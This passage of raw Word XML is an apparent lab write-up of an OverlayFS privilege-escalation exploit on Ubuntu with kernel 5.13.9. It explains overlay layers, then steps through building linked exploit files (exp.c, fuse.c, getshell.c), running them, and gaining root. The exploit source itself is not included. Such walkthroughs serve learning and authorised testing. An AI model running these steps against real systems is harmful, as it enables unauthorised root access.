    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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File and Directory Overlay:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Files and directories in the upper layer can override those in the lower layer. If a file in the upper layer is deleted or modified, the changes are reflected in the unified view. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="180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Copy-on-Write:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> When a file from the lower layer is modified, OverlayFS performs a copy-on-write operation, where the file is copied to the upper layer and then modified. This ensures that the lower layer remains unchanged. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BE">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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F">
      <w:pPr>
        <w:spacing w:after="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Target VM: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C0">
      <w:pPr>
        <w:spacing w:after="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OS: Ubuntu(64x)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">
      <w:pPr>
        <w:spacing w:after="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Kernel: 5.13.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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C3">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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C4">
      <w:pPr>
        <w:spacing w:after="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Steps for Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C5">
      <w:pPr>
        <w:spacing w:after="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Step 1: Install required modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">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sudo apt-get install libfuse-dev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C7">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sudo apt-get install libcap2-dev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">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sudo apt-get install pkg-config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C9">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CA">
      <w:pPr>
        <w:spacing w:after="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Step 2: Create the Required Directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="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mkdir base base/foo base/bar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="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mkdir upper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CD">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">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b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Create a Mount Point and a Work Directory</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /mnt/overlay workdir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CF">
      <w:pP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D0">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b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Mount OverlayFS</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo mount overlay -t overlay -o lowerdir=./base,upperdir=./upper,workdir=./workdir  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D1">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/mnt/overlay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D3">
      <w:pPr>
        <w:spacing w:after="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Step 5: Verify the Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">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b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -s  (root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:spacing w:after="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sz w:val="26"/>
          <w:szCs w:val="26"/>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5.1:</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Check if the file created in /mnt/overlay is reflected in the upper directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">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sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch /mnt/overlay/foo/hello</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">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ls base/foo/       # 'hello' should not appear here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:spacing w:after="0"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2"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">              ls upper/foo/      # 'hello' should appear here</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">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b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>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5.2: Check if changes in base and upper directories are reflected in /mnt/overlay:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch base/from-the-base</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">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touch upper/from-upper</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">              ls /mnt/overlay/from*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">
      <w:pPr>
        <w:spacing w:after="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Step 6: Install necessary files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">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exp.c - </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exp.c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - purpose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DE">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fuse.c - </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">fuse.c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - purpose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">              getshell.c - </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">getshell.c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E1">
      <w:pPr>
        <w:spacing w:after="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Step 7: Create makefile </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">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nano makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E3">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(contents of makefile)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">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all:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">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ab/>
        <w:t xml:space="preserve">gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">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ab/>
        <w:t xml:space="preserve">gcc -o exp exp.c -lcap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">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ab/>
        <w:t xml:space="preserve">gcc -o gc getshell.c</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">             clean:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E8">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ab/>
        <w:t xml:space="preserve">rm -rf exp gc fuse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EA">
      <w:pPr>
        <w:spacing w:after="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Step 8: Compile all the files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">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make all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">
      <w:pPr>
        <w:spacing w:after="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Step 9: Run the fuse program </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">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./fuse ./ovlcap/lower ./gc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">
      <w:pPr>
        <w:spacing w:after="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Step 10: Execute the exp program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">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./exp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">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b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POC:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="3326164"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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34050" cy="3326164"/>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after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig: getting root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">privilages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
